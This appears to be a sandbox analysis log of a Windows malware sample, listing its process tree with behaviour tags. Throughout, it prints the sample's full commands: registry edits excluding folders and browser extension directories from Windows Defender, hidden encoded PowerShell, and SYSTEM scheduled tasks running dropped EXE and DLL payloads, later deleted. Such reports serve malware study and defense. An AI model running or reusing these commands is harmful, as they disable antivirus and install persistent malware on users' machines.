C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:6552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2472
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵PID:4344
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵PID:5460
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵PID:6688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵PID:4976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵PID:6460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵PID:6072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵PID:5500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵PID:444
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gujLJpmjG" /SC once /ST 00:45:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:6848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gujLJpmjG"2⤵PID:3608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gujLJpmjG"2⤵PID:1524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:57:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exe\" y7 /MGsCdidxY 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:7148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵PID:6892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 10682⤵
- Program crash
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5672
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4144
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exe y7 /MGsCdidxY 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3888
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:6172
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:6156
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6896
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4512
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2592
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:6460
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:1168
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5584
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1664
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5212
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5780
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3168
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5344
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6524 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5360
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵PID:6168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6412
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:3836
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:3604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4236 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5212
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\WlzzPF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\DXMumWU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵PID:6940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵PID:6156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\OWlKdvP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\WZAEPle.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\dOdgGqZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\HeBupxH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:38:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll\",#1 /tAVdidHBHi 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵PID:5432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CWXZI1" /SC once /ST 01:38:05 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
PID:6888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CWXZI1"2⤵PID:3836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CWXZI1"2⤵PID:3276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵PID:2984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 25642⤵
- Program crash
PID:1844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3900 -ip 39001⤵PID:6748
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x474 0x4241⤵
- Suspicious use of AdjustPrivilegeToken
PID:6220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:6852
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll",#1 /tAVdidHBHi 3851181⤵PID:4536
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll",#1 /tAVdidHBHi 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:5152 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵PID:4784
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847182⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵PID:6652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:32⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵PID:6968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵PID:6168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:12⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:12⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:12⤵PID:1040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:82⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:82⤵PID:4684
-
-
